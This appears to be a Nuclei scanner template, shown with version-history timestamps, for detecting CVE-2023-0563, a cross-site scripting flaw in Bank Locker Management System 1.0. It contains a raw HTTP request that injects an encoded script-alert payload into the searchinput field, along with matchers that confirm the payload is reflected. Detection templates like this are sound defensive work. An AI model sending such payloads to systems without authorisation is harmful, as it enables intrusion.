2023-06-25 18:49:10 +00:00
id : CVE-2023-0563
info :
2023-06-26 04:40:47 +00:00
name : Bank Locker Management System - Cross-Site Scripting
2023-06-25 18:49:10 +00:00
author : Harsh
severity : medium
description : |
A vulnerability classified as problematic has been found in PHPGurukul Bank Locker Management System 1.0. This affects an unknown part of the file add-locker-form.php of the component Assign Locker. The manipulation of the argument ahname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
reference :
- https://vuldb.com/?ctiid.219717
- https://nvd.nist.gov/vuln/detail/CVE-2023-0563
2023-07-11 19:49:27 +00:00
- https://vuldb.com/?id.219717
2023-06-25 18:49:10 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score : 4.8
cve-id : CVE-2023-0563
cwe-id : CWE-79
2023-08-31 11:46:18 +00:00
epss-score : 0.00563
2023-07-11 19:49:27 +00:00
cpe : cpe:2.3:a:bank_locker_management_system_project:bank_locker_management_system:1.0:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.74832
2023-06-25 18:49:10 +00:00
metadata :
2023-06-28 04:35:22 +00:00
max-request : 1
2023-06-25 18:49:10 +00:00
verified : true
2023-07-11 19:49:27 +00:00
vendor : bank_locker_management_system_project
product : bank_locker_management_system
2023-06-26 04:40:47 +00:00
tags : cve,cve2023,blms,xss
2023-06-25 18:49:10 +00:00
http :
- raw :
- |
2023-06-26 04:40:47 +00:00
POST /search-locker-details.php HTTP/1.1
2023-06-25 18:49:10 +00:00
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
searchinput=%E2%80%9C%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=
cookie-reuse : true
redirects : true
matchers :
- type : dsl
dsl :
- 'status_code == 200'
- 'contains(body, "/><script>alert(document.domain)</script>")'
- 'contains(body, "Bank Locker Management System")'
condition : and